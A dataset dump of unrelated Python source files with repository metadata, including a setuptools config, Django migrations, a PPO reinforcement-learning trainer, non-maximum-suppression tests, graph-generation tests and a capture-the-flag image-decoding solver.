f1997085668d1db3776b1d54457a43aacfbba33c | 3cb0f57347d06d976ae49812fa383e8845475c62 | /WebServices/trunk/setup.py | 0774bdab90c2feba99bbb78d8f7ceb7a7f8dc7e6 | [] | no_license | UfSoft/ISPManCCP-V2 | 9aa99731e54c39fd05ed5cf969e2e3dcbd444f7e | 1521cea43254d017129b07c07266a0e3bfd64ab1 | refs/heads/master | 2021-01-10T20:26:42.282246 | 2008-05-10T15:13:56 | 2008-05-10T15:13:56 | 26,618,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 637 | py | #!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='ISPManWebServices',
version='0.1',
description='WebServices backend to ISPMan',
author='Pedro Algarvio',
author_email='ufs@ufsoft.org',
# url='',
install_requires=["Pylons>=0.9.6.1"],
packages=find_packages(exclude=['ez_setup']),
include_package_data=True,
test_suite='nose.collector',
package_data={'ispman.services': ['i18n/*/LC_MESSAGES/*.mo']},
entry_points="""
[paste.app_factory]
main = ispman.services.wsgiapp:make_app
[paste.app_install]
main = pylons.util:PylonsInstaller
""",
)
| [
"ufs@ufsoft.org"
] | ufs@ufsoft.org |
9f5d1f6f7e14b928ee57ce640f3ef14235c95b2f | 339dbd84a793588d7c278e2c68c08fff6cdd7b5a | /ImuData/ImuPreProcess.py | 25817f3b675e881527a31405d7b2a963fa14e676 | [] | no_license | wystephen/LightPythonProject | 3a7f2b31f1d8a2da109bb6e0783dd996d2ffaa12 | d2a356029a18ce428b3e33622f9ce1de3f8907c1 | refs/heads/master | 2021-04-27T03:57:09.016236 | 2018-04-03T02:51:37 | 2018-04-03T02:51:37 | 122,722,155 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,429 | py | # -*- coding:utf-8 -*-
# carete by steve at 2018 / 03 / 03 13:44
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import re
import time
import datetime
class imuread:
def __init__(self, file_name='MT_07700791-003-000.csv'):
self.file_name = file_name
def load(self):
file_lines = open(self.file_name).readlines()
self.data = np.zeros([len(file_lines) - 7, 10])
for i in range(7, len(file_lines)):
# print(file_lines[i])
matcher = re.compile('[-]{0,1}[0-9]{1,3}\.{0,1}[0-9]{0,15}')
all_num = matcher.findall(file_lines[i])
# print(tt)
tt = datetime.datetime(int(all_num[2]), int(all_num[3]), int(all_num[4]), int(all_num[5]), int(all_num[6]),
int(all_num[7]))
print(tt.timestamp() + float(all_num[1]) * 1e-9)
self.data[i - 7, 0] = tt.timestamp() + float(all_num[0]) * 1e-9
# print(all_num)
for j in range(9):
self.data[i - 7, 1 + j] = float(all_num[j + len(all_num) - 9])
# plt.figure()
# plt.imshow(self.data/self.data.std(axis=1))
# plt.imshow(self.data)
# plt.colorbar()
# plt.show()
def save(self, file_name):
np.savetxt(file_name, self.data)
if __name__ == '__main__':
ir = imuread(file_name='2018-03-03-17h35.TXT')
ir.load()
| [
"551619855@qq.com"
] | 551619855@qq.com |
fed51cebf5fbf3c46d9c33bc71716accfdcaad96 | 53def173f44b9665d1194195577c50058c1f698a | /angstromctf/2020/misc/msd/solve.py | bbc29a69de3b8584e6a90560da9c5fc093b7af47 | [] | no_license | blairsec/challenges | 3558f2b7f6866718c4f1ad026d84b6651e31e7d0 | 928345a6175adf0e88017b28fe895bc924527853 | refs/heads/master | 2023-05-24T09:44:17.779099 | 2023-05-17T17:03:34 | 2023-05-17T17:03:34 | 184,929,220 | 17 | 6 | null | 2023-03-03T17:21:31 | 2019-05-04T18:12:01 | JavaScript | UTF-8 | Python | false | false | 790 | py | from PIL import Image
im = Image.open("output.png")
im2 = Image.open("breathe.jpg")
width, height = im.size
def decode(i, compare):
i = list(str(i).zfill(len(str(compare))))
return i[0]
s = ""
for j in range(height):
for i in range(width):
data = []
for a, compare in zip(im.getpixel((i,j)), im2.getpixel((i, j))):
data.append(decode(a, compare))
s += ''.join(data)
s = list(s)
data = []
while len(s) > 0:
t = ""
curr = s.pop(0)
if curr != "1":
t += curr + s.pop(0)
else:
t += curr + s.pop(0) + s.pop(0)
data.append(t)
data = ''.join([chr(int(i)) for i in data])
import re
r1 = re.findall(r"actf{.*?}", data)
min = min(map(len, r1))
for i in r1:
if len(i) == min:
print(i)
| [
"github@kevinhiggs.com"
] | github@kevinhiggs.com |
02392e079a451cabcac5107b47c21e5b66bc1c35 | 515e45025082ffbfda960635e31f99c4ca1aa7d8 | /src/html5_parser/stdlib_etree.py | 8fd1a4e10e7347e79a7c21a3e752c474e3806553 | [
"Apache-2.0"
] | permissive | kovidgoyal/html5-parser | 62a3e626cba563076c7503fafb2fd83c506c61dd | ef7d4af932293fa04c3ac78a77b7fb2f0ac2f26d | refs/heads/master | 2023-05-30T09:44:52.629086 | 2023-04-12T05:07:46 | 2023-04-12T05:07:46 | 93,229,662 | 714 | 42 | Apache-2.0 | 2021-07-26T13:23:04 | 2017-06-03T06:56:36 | C | UTF-8 | Python | false | false | 1,525 | py | #!/usr/bin/env python
# vim:fileencoding=utf-8
# License: Apache 2.0 Copyright: 2017, Kovid Goyal <kovid at kovidgoyal.net>
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
from lxml.etree import _Comment
if sys.version_info.major < 3:
from xml.etree.cElementTree import Element, SubElement, ElementTree, Comment, register_namespace
else:
from xml.etree.ElementTree import Element, SubElement, ElementTree, Comment, register_namespace
register_namespace('svg', "http://www.w3.org/2000/svg")
register_namespace('xlink', "http://www.w3.org/1999/xlink")
def convert_elem(src, parent=None):
if parent is None:
ans = Element(src.tag, dict(src.items()))
else:
ans = SubElement(parent, src.tag, dict(src.items()))
return ans
def adapt(src_tree, return_root=True, **kw):
src_root = src_tree.getroot()
dest_root = convert_elem(src_root)
stack = [(src_root, dest_root)]
while stack:
src, dest = stack.pop()
for src_child in src.iterchildren():
if isinstance(src_child, _Comment):
dest_child = Comment(src_child.text)
dest_child.tail = src_child.tail
dest.append(dest_child)
else:
dest_child = convert_elem(src_child, dest)
dest_child.text, dest_child.tail = src_child.text, src_child.tail
stack.append((src_child, dest_child))
return dest_root if return_root else ElementTree(dest_root)
| [
"kovid@kovidgoyal.net"
] | kovid@kovidgoyal.net |
8202d586e8a0a42e46ec0f99eeaa08e3b64a791a | 01ab44468c01151020031de57402a08c76d8efb6 | /App/migrations/0006_tweets_time.py | 0911cdd9a48f8b4b454465905453ad8dbfe208ad | [] | no_license | Chukslord1/Arctype_Tweets_Heatmap | 33c46d8d7a7ac24d05e3cda7e6c7525111d05257 | 16e377dfc215be46786e17e4cf35e89a2b7f4395 | refs/heads/main | 2023-06-19T22:59:53.127630 | 2021-07-19T01:00:32 | 2021-07-19T01:00:32 | 376,182,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py | # Generated by Django 3.1.7 on 2021-06-16 03:31
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('App', '0005_auto_20210615_2339'),
]
operations = [
migrations.AddField(
model_name='tweets',
name='time',
field=models.TextField(default=datetime.datetime(2021, 6, 16, 3, 31, 2, 119115, tzinfo=utc)),
preserve_default=False,
),
]
| [
"chukslord1@gmail.com"
] | chukslord1@gmail.com |
8903f5552458a212377dedd24f393aca93c9b316 | 961d2a56c1f573edebb6d67b6d5874b10ce01791 | /focusgroups/migrations/0002_auto_20160905_1705.py | 98d6390d8dbec20b23e09963f1e037db8c19bd4a | [
"MIT"
] | permissive | CARocha/ciatEspecies | d7dbf4ba09e4c9255dc2eab2eaa905960d7e96c7 | 10777d9487dd3658388243c304dd640b476cb3e3 | refs/heads/master | 2020-04-06T07:11:40.607520 | 2016-09-06T19:29:19 | 2016-09-06T19:29:19 | 60,646,256 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-09-05 17:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('focusgroups', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='community',
name='county',
),
migrations.RemoveField(
model_name='focusgroup',
name='county',
),
migrations.AddField(
model_name='community',
name='province',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='focusgroups.Province'),
),
]
| [
"erickmurillo22@gmail.com"
] | erickmurillo22@gmail.com |
985214f3ae0e8d102213d315bb2b7881b582a8f8 | db14851d3eca5fd09277715c3a0558a5f5d5894c | /dot2svg.py | 788a2be68d0f24d6c5511d6fe44e7a36cd4c5b5b | [] | no_license | marxin/script-misc | 916c007308a9ea350ade256dde0a682349a964e4 | 06f5c418b8bc4e28d5e04e3cf475f680ed7781c3 | refs/heads/master | 2023-08-23T13:13:30.567072 | 2023-08-22T14:22:59 | 2023-08-22T14:22:59 | 10,321,279 | 8 | 1 | null | 2021-03-20T10:56:59 | 2013-05-27T19:33:40 | C++ | UTF-8 | Python | false | false | 174 | py | #!/usr/bin/env python3
import glob
import subprocess
for f in sorted(glob.glob('*.dot')):
print(f)
subprocess.check_output(f'dot -Tsvg {f} -o {f}.svg', shell=True)
| [
"mliska@suse.cz"
] | mliska@suse.cz |
7c547c68f98a736486c122985b30d5e935e0a74a | 0afd765c0a3c06e6c893782fc8bd9d5bd4eac20d | /synchronized_ppo_CartPole/ppo.py | 1833d0999b1f725abd3b3573d428aea6112e227c | [] | no_license | chagmgang/synch_pysc2 | fdcb2bbb36c81af6ac2c31183b02f26aee33d739 | 57ca1e533446b1ed61c4d3d432d47d293148b6be | refs/heads/master | 2020-03-19T15:40:24.573995 | 2018-07-02T05:36:35 | 2018-07-02T05:36:35 | 136,680,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,480 | py | import tensorflow as tf
import copy
class PPOTrain:
def __init__(self, Policy, Old_Policy, gamma=0.95, clip_value=0.2, c_1=1, c_2=0.01):
"""
:param Policy:
:param Old_Policy:
:param gamma:
:param clip_value:
:param c_1: parameter for value difference
:param c_2: parameter for entropy bonus
"""
self.Policy = Policy
self.Old_Policy = Old_Policy
self.gamma = gamma
pi_trainable = self.Policy.get_trainable_variables()
old_pi_trainable = self.Old_Policy.get_trainable_variables()
# assign_operations for policy parameter values to old policy parameters
with tf.variable_scope('assign_op'):
self.assign_ops = []
for v_old, v in zip(old_pi_trainable, pi_trainable):
self.assign_ops.append(tf.assign(v_old, v))
# inputs for train_op
with tf.variable_scope('train_inp'):
self.actions = tf.placeholder(dtype=tf.int32, shape=[None], name='actions')
self.rewards = tf.placeholder(dtype=tf.float32, shape=[None], name='rewards')
self.v_preds_next = tf.placeholder(dtype=tf.float32, shape=[None], name='v_preds_next')
self.gaes = tf.placeholder(dtype=tf.float32, shape=[None], name='gaes')
act_probs = self.Policy.act_probs
act_probs_old = self.Old_Policy.act_probs
# probabilities of actions which agent took with policy
act_probs = act_probs * tf.one_hot(indices=self.actions, depth=act_probs.shape[1])
act_probs = tf.reduce_sum(act_probs, axis=1)
# probabilities of actions which agent took with old policy
act_probs_old = act_probs_old * tf.one_hot(indices=self.actions, depth=act_probs_old.shape[1])
act_probs_old = tf.reduce_sum(act_probs_old, axis=1)
with tf.variable_scope('loss/clip'):
# ratios = tf.divide(act_probs, act_probs_old)
ratios = tf.exp(tf.log(act_probs) - tf.log(act_probs_old))
clipped_ratios = tf.clip_by_value(ratios, clip_value_min=1 - clip_value, clip_value_max=1 + clip_value)
loss_clip = tf.minimum(tf.multiply(self.gaes, ratios), tf.multiply(self.gaes, clipped_ratios))
loss_clip = tf.reduce_mean(loss_clip)
tf.summary.scalar('loss_clip', loss_clip)
# construct computation graph for loss of value function
with tf.variable_scope('loss/vf'):
v_preds = self.Policy.v_preds
loss_vf = tf.squared_difference(self.rewards + self.gamma * self.v_preds_next, v_preds)
loss_vf = tf.reduce_mean(loss_vf)
tf.summary.scalar('loss_vf', loss_vf)
# construct computation graph for loss of entropy bonus
with tf.variable_scope('loss/entropy'):
entropy = -tf.reduce_sum(self.Policy.act_probs *
tf.log(tf.clip_by_value(self.Policy.act_probs, 1e-10, 1.0)), axis=1)
entropy = tf.reduce_mean(entropy, axis=0) # mean of entropy of pi(obs)
tf.summary.scalar('entropy', entropy)
with tf.variable_scope('loss'):
loss = loss_clip - c_1 * loss_vf + c_2 * entropy
loss = -loss # minimize -loss == maximize loss
tf.summary.scalar('loss', loss)
self.merged = tf.summary.merge_all()
optimizer = tf.train.AdamOptimizer(learning_rate=1e-4, epsilon=1e-5)
self.train_op = optimizer.minimize(loss, var_list=pi_trainable)
def train(self, obs, actions, rewards, v_preds_next, gaes):
tf.get_default_session().run([self.train_op], feed_dict={self.Policy.obs: obs,
self.Old_Policy.obs: obs,
self.actions: actions,
self.rewards: rewards,
self.v_preds_next: v_preds_next,
self.gaes: gaes})
def get_summary(self, obs, actions, rewards, v_preds_next, gaes):
return tf.get_default_session().run([self.merged], feed_dict={self.Policy.obs: obs,
self.Old_Policy.obs: obs,
self.actions: actions,
self.rewards: rewards,
self.v_preds_next: v_preds_next,
self.gaes: gaes})
def assign_policy_parameters(self):
# assign policy parameter values to old policy parameters
return tf.get_default_session().run(self.assign_ops)
def get_gaes(self, rewards, v_preds, v_preds_next):
deltas = [r_t + self.gamma * v_next - v for r_t, v_next, v in zip(rewards, v_preds_next, v_preds)]
# calculate generative advantage estimator(lambda = 1), see ppo paper eq(11)
gaes = copy.deepcopy(deltas)
for t in reversed(range(len(gaes) - 1)): # is T-1, where T is time step which run policy
gaes[t] = gaes[t] + self.gamma * gaes[t + 1]
return gaes | [
"chagmgang@gmail.com"
] | chagmgang@gmail.com |
e09eefe38c46144b260e759163fdbc18fd82f227 | 1b8fba01309da37f8d0ff408765c1d545fc588d6 | /tests/modeling/test_nms.py | 56bdfdf0b14eb53c31feaaf464bd4eee1bfa11fd | [
"Apache-2.0"
] | permissive | supriyar/d2go | 9bd54bcb2704c91d7bf0d5fceab2ac4f23d59346 | 9dc1600b05ecf60fab556599b4c0bc6c32837449 | refs/heads/main | 2023-08-11T16:19:50.578547 | 2021-10-01T17:43:32 | 2021-10-01T17:44:49 | 413,646,825 | 0 | 0 | Apache-2.0 | 2021-10-05T02:20:59 | 2021-10-05T02:20:58 | null | UTF-8 | Python | false | false | 7,617 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
import numpy as np
import torch
from detectron2.layers import nms as box_nms
class TestNMS(unittest.TestCase):
def test_nms_cpu(self):
"""Match unit test UtilsNMSTest.TestNMS in
caffe2/operators/generate_proposals_op_util_nms_test.cc
"""
inputs = (
np.array(
[
10,
10,
50,
60,
0.5,
11,
12,
48,
60,
0.7,
8,
9,
40,
50,
0.6,
100,
100,
150,
140,
0.9,
99,
110,
155,
139,
0.8,
]
)
.astype(np.float32)
.reshape(-1, 5)
)
boxes = torch.from_numpy(inputs[:, :4])
scores = torch.from_numpy(inputs[:, 4])
test_thresh = [0.1, 0.3, 0.5, 0.8, 0.9]
gt_indices = [[1, 3], [1, 3], [1, 3], [1, 2, 3, 4], [0, 1, 2, 3, 4]]
for thresh, gt_index in zip(test_thresh, gt_indices):
keep_indices = box_nms(boxes, scores, thresh)
keep_indices = np.sort(keep_indices)
np.testing.assert_array_equal(keep_indices, np.array(gt_index))
def test_nms1_cpu(self):
"""Match unit test UtilsNMSTest.TestNMS1 in
caffe2/operators/generate_proposals_op_util_nms_test.cc
"""
boxes = torch.from_numpy(
np.array(
[
[350.9821, 161.8200, 369.9685, 205.2372],
[250.5236, 154.2844, 274.1773, 204.9810],
[471.4920, 160.4118, 496.0094, 213.4244],
[352.0421, 164.5933, 366.4458, 205.9624],
[166.0765, 169.7707, 183.0102, 232.6606],
[252.3000, 183.1449, 269.6541, 210.6747],
[469.7862, 162.0192, 482.1673, 187.0053],
[168.4862, 174.2567, 181.7437, 232.9379],
[470.3290, 162.3442, 496.4272, 214.6296],
[251.0450, 155.5911, 272.2693, 203.3675],
[252.0326, 154.7950, 273.7404, 195.3671],
[351.7479, 161.9567, 370.6432, 204.3047],
[496.3306, 161.7157, 515.0573, 210.7200],
[471.0749, 162.6143, 485.3374, 207.3448],
[250.9745, 160.7633, 264.1924, 206.8350],
[470.4792, 169.0351, 487.1934, 220.2984],
[474.4227, 161.9546, 513.1018, 215.5193],
[251.9428, 184.1950, 262.6937, 207.6416],
[252.6623, 175.0252, 269.8806, 213.7584],
[260.9884, 157.0351, 288.3554, 206.6027],
[251.3629, 164.5101, 263.2179, 202.4203],
[471.8361, 190.8142, 485.6812, 220.8586],
[248.6243, 156.9628, 264.3355, 199.2767],
[495.1643, 158.0483, 512.6261, 184.4192],
[376.8718, 168.0144, 387.3584, 201.3210],
[122.9191, 160.7433, 172.5612, 231.3837],
[350.3857, 175.8806, 366.2500, 205.4329],
[115.2958, 162.7822, 161.9776, 229.6147],
[168.4375, 177.4041, 180.8028, 232.4551],
[169.7939, 184.4330, 181.4767, 232.1220],
[347.7536, 175.9356, 355.8637, 197.5586],
[495.5434, 164.6059, 516.4031, 207.7053],
[172.1216, 194.6033, 183.1217, 235.2653],
[264.2654, 181.5540, 288.4626, 214.0170],
[111.7971, 183.7748, 137.3745, 225.9724],
[253.4919, 186.3945, 280.8694, 210.0731],
[165.5334, 169.7344, 185.9159, 232.8514],
[348.3662, 184.5187, 354.9081, 201.4038],
[164.6562, 162.5724, 186.3108, 233.5010],
[113.2999, 186.8410, 135.8841, 219.7642],
[117.0282, 179.8009, 142.5375, 221.0736],
[462.1312, 161.1004, 495.3576, 217.2208],
[462.5800, 159.9310, 501.2937, 224.1655],
[503.5242, 170.0733, 518.3792, 209.0113],
[250.3658, 195.5925, 260.6523, 212.4679],
[108.8287, 163.6994, 146.3642, 229.7261],
[256.7617, 187.3123, 288.8407, 211.2013],
[161.2781, 167.4801, 186.3751, 232.7133],
[115.3760, 177.5859, 163.3512, 236.9660],
[248.9077, 188.0919, 264.8579, 207.9718],
[108.1349, 160.7851, 143.6370, 229.6243],
[465.0900, 156.7555, 490.3561, 213.5704],
[107.5338, 173.4323, 141.0704, 235.2910],
]
).astype(np.float32)
)
scores = torch.from_numpy(
np.array(
[
0.1919,
0.3293,
0.0860,
0.1600,
0.1885,
0.4297,
0.0974,
0.2711,
0.1483,
0.1173,
0.1034,
0.2915,
0.1993,
0.0677,
0.3217,
0.0966,
0.0526,
0.5675,
0.3130,
0.1592,
0.1353,
0.0634,
0.1557,
0.1512,
0.0699,
0.0545,
0.2692,
0.1143,
0.0572,
0.1990,
0.0558,
0.1500,
0.2214,
0.1878,
0.2501,
0.1343,
0.0809,
0.1266,
0.0743,
0.0896,
0.0781,
0.0983,
0.0557,
0.0623,
0.5808,
0.3090,
0.1050,
0.0524,
0.0513,
0.4501,
0.4167,
0.0623,
0.1749,
]
).astype(np.float32)
)
gt_indices = np.array(
[
1,
6,
7,
8,
11,
12,
13,
14,
17,
18,
19,
21,
23,
24,
25,
26,
30,
32,
33,
34,
35,
37,
43,
44,
47,
50,
]
)
keep_indices = box_nms(boxes, scores, 0.5)
keep_indices = np.sort(keep_indices)
np.testing.assert_array_equal(keep_indices, gt_indices)
if __name__ == "__main__":
unittest.main()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
6beb23d647745a308be0869da61a993aa0aff98b | ccf94dcb6b1500fcbbd56964ae8c4832a496b8b3 | /python/baiduads-sdk-auto/test/test_get_hit_customer_policy_response_wrapper.py | 00a7cf98be3ac3940848931d77db3651c4cc6030 | [
"Apache-2.0"
] | permissive | baidu/baiduads-sdk | 24c36b5cf3da9362ec5c8ecd417ff280421198ff | 176363de5e8a4e98aaca039e4300703c3964c1c7 | refs/heads/main | 2023-06-08T15:40:24.787863 | 2023-05-20T03:40:51 | 2023-05-20T03:40:51 | 446,718,177 | 16 | 11 | Apache-2.0 | 2023-06-02T05:19:40 | 2022-01-11T07:23:17 | Python | UTF-8 | Python | false | false | 1,158 | py | """
dev2 api schema
'dev2.baidu.com' api schema # noqa: E501
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import baiduads
from baiduads.common.model.api_response_header import ApiResponseHeader
from baiduads.shieldfunction.model.get_hit_customer_policy_response_wrapper_body import GetHitCustomerPolicyResponseWrapperBody
globals()['ApiResponseHeader'] = ApiResponseHeader
globals()['GetHitCustomerPolicyResponseWrapperBody'] = GetHitCustomerPolicyResponseWrapperBody
from baiduads.shieldfunction.model.get_hit_customer_policy_response_wrapper import GetHitCustomerPolicyResponseWrapper
class TestGetHitCustomerPolicyResponseWrapper(unittest.TestCase):
"""GetHitCustomerPolicyResponseWrapper unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGetHitCustomerPolicyResponseWrapper(self):
"""Test GetHitCustomerPolicyResponseWrapper"""
# FIXME: construct object with mandatory attributes with example values
# model = GetHitCustomerPolicyResponseWrapper() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"tokimekiyxp@foxmail.com"
] | tokimekiyxp@foxmail.com |
911ca58c9609243397f7590c354a1e147e710862 | c4edcdff1a4ebe45e7198aaf65caf3a1f71053ab | /git_version/migrations/0001_initial.py | 4d5f800ce654c259c96cf37e3a2aabd9f1291b5b | [] | no_license | FriskByBergen/friskby | 5584cb2ea099e2c0fecd4762f56effc714fd06ee | 7a444af87c23ffd6b638055e49ccd608efcd3ee6 | refs/heads/master | 2020-05-21T15:09:43.367245 | 2017-06-06T17:48:58 | 2017-06-06T17:48:58 | 45,236,960 | 3 | 10 | null | 2017-06-06T17:48:59 | 2015-10-30T07:58:33 | Python | UTF-8 | Python | false | false | 809 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-30 05:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='GitVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ref', models.CharField(max_length=128, verbose_name='Git ref')),
('repo', models.CharField(default='https://github.com/FriskbyBergen/friskby', max_length=128, verbose_name='Git repo')),
('description', models.CharField(max_length=256, verbose_name='Description')),
],
),
]
| [
"joakim.hove@gmail.com"
] | joakim.hove@gmail.com |
a86d76d1dc046199d8b9687e4fd0dd3c904cc787 | 54d8a05e0238e96eb43e4893bacba024e490bf11 | /python-projects/algo_and_ds/prime_factoras.py | bbf5b73c210c45398fd5235ff4e25e5c40b05128 | [] | no_license | infinite-Joy/programming-languages | 6ce05aa03afd7edeb0847c2cc952af72ad2db21e | 0dd3fdb679a0052d6d274d19040eadd06ae69cf6 | refs/heads/master | 2023-05-29T10:34:44.075626 | 2022-07-18T13:53:02 | 2022-07-18T13:53:02 | 30,753,185 | 3 | 5 | null | 2023-05-22T21:54:46 | 2015-02-13T11:14:25 | Jupyter Notebook | UTF-8 | Python | false | false | 707 | py | # find the prime factors based on the geeks for geeks tut
from math import sqrt
def is_prime(n):
if n == 1: return 1
if n == 2: return True
if n == 3: return True
if n % 2 == 0 or n % 3 == 0:
return False
for i in range(5, int(sqrt(n)), 6):
if (n % i == 0) or (n % (i + 2) == 0):
return False
return True
def print_prime_factors(n):
print("printing prime factors of {}".format(n))
if n <= 1:
return
i = 2
while n >= i * i:
if is_prime(i):
while n % i == 0:
print(i)
n /= i
i += 1
if n > 1:
print(int(n))
print_prime_factors(450)
print_prime_factors(84)
| [
"joydeepubuntu@gmail.com"
] | joydeepubuntu@gmail.com |
b8688c90ac225fe9f656e6f7b494f754c01ab1bd | f02e654d5590a861804e3220ed76ba2192e1699b | /simulator/selectionmanager.py | 9ad5c1ccfd532073cda2be6ad7e765cab0e059be | [
"BSD-3-Clause"
] | permissive | AmarNathH/software | 73e2afd3affaf2c1595b406480edac8b8fb2fcac | e225810c7501250f48add43349a64f49450cc79f | refs/heads/master | 2020-12-02T20:50:18.439874 | 2017-07-03T16:51:07 | 2017-07-03T16:51:07 | 96,219,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,940 | py |
from direct.showbase.DirectObject import DirectObject
from panda3d.core import KeyboardButton
from panda3d.core import MouseButton
from panda3d.core import NodePath
from panda3d.core import Point3
from panda3d.core import Vec4
from mouseevent import MouseEventListener
from selectionengine import SelectionEngine
from handles import Handle
from cameracontroller import CameraController, EVT_CAMERA_MODE, TRACKBALL
class SelectionManager(DirectObject, MouseEventListener):
defaultMgr = None
@classmethod
def getDefault(cls):
if cls.defaultMgr == None:
cls.defaultMgr = SelectionManager()
return cls.defaultMgr
@classmethod
def setDefault(cls, manager):
cls.defaultMgr = manager
def __init__(self, selectionEngine = None):
self.selection = []
self.enabled = False
self.editMode = None
if selectionEngine == None:
selectionEngine = SelectionEngine.getDefault()
self.engine = selectionEngine
self.engine.addMouseListener(self)
self.handle = Handle()
self.handle.setClients([])
render.attachNewNode(self.handle)
CameraController.getInstance().addEventHandler(EVT_CAMERA_MODE,
self._cameraModeHandler)
self.accept('f', self._setFocus)
def getSelectionCenter(self):
if not self.selection:
return Point3()
else:
min, max = Point3(), Point3()
tmpmin, tmpmax = Point3(), Point3()
np = NodePath(self.selection[0])
np.calcTightBounds(min, max)
min += np.getPos(render) - np.getPos()
max += np.getPos(render) - np.getPos()
for i in xrange(1, len(self.selection)):
np = NodePath(self.selection[i])
np.calcTightBounds(tmpmin, tmpmax)
if np.getParent() != render:
tmpmin += np.getPos(render) - np.getPos()
tmpmax += np.getPos(render) - np.getPos()
min = min.fmin(tmpmin)
max = max.fmax(tmpmax)
return Point3(min + (max - min)/2)
def _setFocus(self):
# This function handles presses of the F key.
if self.selection:
CameraController.getInstance().setFocus(self.getSelectionCenter())
else:
CameraController.getInstance().setFocus(Point3())
def _cameraModeHandler(self, cameraController):
if cameraController.getCameraMode() == TRACKBALL:
self.enable(True)
else:
self.enable(False)
def enable(self, enabled=True):
if self.enabled and enabled == False:
self.deselectAll()
self.handle.setClients([])
self.enabled = enabled
def registerNode(self, node):
print 'registering new node to selmgr', node
node.addMouseListener(self)
def removeNode(self, node):
node.removeMouseListener(self)
if node in self.selection:
node.setSelected(False)
self.selection.remove(node)
def deselectAll(self):
for node in self.selection:
node.setSelected(False)
self.selection = []
def _setEditMode(self, editMode):
if self.editMode == editMode:
return
self.editMode = editMode
if editMode:
self.engine.setHighlightColor(Vec4(1, 0.8, 0, 1))
else:
self.engine.setHighlightColor(Vec4(0.6, 0.6, 1, 1))
self.deselectAll()
def mousePressed(self, event):
print 'got mouse pressed event from', event.sender
if (not self.enabled or
event.modifiers.isDown(KeyboardButton.control())):
print 'short circuiting'
return
shiftDown = event.modifiers.isDown(KeyboardButton.shift())
if event.sender == self.engine:
if not shiftDown:
self.deselectAll()
else:
self._setEditMode(event.modifiers.isDown(MouseButton.three()))
node = event.sender
if shiftDown:
# Shift-clicking a node toggles its selected state.
if node.isSelected():
self.selection.remove(node)
node.setSelected(False)
else:
self.selection.append(node)
node.setSelected(True)
elif len(self.selection) == 1 and node.isSelected():
# This is already the only node selected.
return
else:
print 'selecting', node
self.deselectAll()
node.setSelected(True)
self.selection.append(node)
if self.editMode:
self.handle.setClients([NodePath(n) for n in self.selection],
self.getSelectionCenter())
else:
self.handle.setClients([])
| [
"software@cuauv.org"
] | software@cuauv.org |
bcc70fcaea7e68b2cda51f40ce9e39dcc644bcae | 8f0b0ec0a0a2db00e2134b62a1515f0777d69060 | /scripts/study_case/ID_4/test/utils/test_random.py | 8fd3068976605ffd63ea7b8c208e9a7cd2274945 | [
"Apache-2.0",
"MIT"
] | permissive | Liang813/GRIST | 2add5b4620c3d4207e7661eba20a79cfcb0022b5 | 544e843c5430abdd58138cdf1c79dcf240168a5f | refs/heads/main | 2023-06-09T19:07:03.995094 | 2021-06-30T05:12:19 | 2021-06-30T05:12:19 | 429,016,034 | 0 | 0 | Apache-2.0 | 2021-11-17T11:19:48 | 2021-11-17T11:19:47 | null | UTF-8 | Python | false | false | 1,382 | py | import torch
import numpy as np
from scripts.study_case.ID_4.torch_geometric.utils import (
erdos_renyi_graph, stochastic_blockmodel_graph, barabasi_albert_graph)
def test_erdos_renyi_graph():
torch.manual_seed(1234)
edge_index = erdos_renyi_graph(5, 0.2, directed=False)
assert edge_index.tolist() == [
[0, 1, 1, 1, 2, 4],
[1, 0, 2, 4, 1, 1],
]
edge_index = erdos_renyi_graph(5, 0.5, directed=True)
assert edge_index.tolist() == [
[1, 1, 2, 2, 3, 4, 4, 4],
[0, 3, 0, 4, 0, 0, 1, 3],
]
def test_stochastic_blockmodel_graph():
torch.manual_seed(12345)
block_sizes = [2, 2, 4]
edge_probs = [
[0.25, 0.05, 0.02],
[0.05, 0.35, 0.07],
[0.02, 0.07, 0.40],
]
edge_index = stochastic_blockmodel_graph(
block_sizes, edge_probs, directed=False)
assert edge_index.tolist() == [
[2, 3, 4, 4, 5, 5, 6, 7, 7, 7],
[3, 2, 5, 7, 4, 7, 7, 4, 5, 6],
]
edge_index = stochastic_blockmodel_graph(
block_sizes, edge_probs, directed=True)
assert edge_index.tolist() == [
[0, 1, 3, 5, 6, 6, 7, 7],
[3, 3, 2, 4, 4, 7, 5, 6],
]
def test_barabasi_albert_graph():
torch.manual_seed(12345)
np.random.seed(12345)
edge_index = barabasi_albert_graph(num_nodes=8, num_edges=3)
assert edge_index.size() == (2, 26)
| [
"793679547@qq.com"
] | 793679547@qq.com |
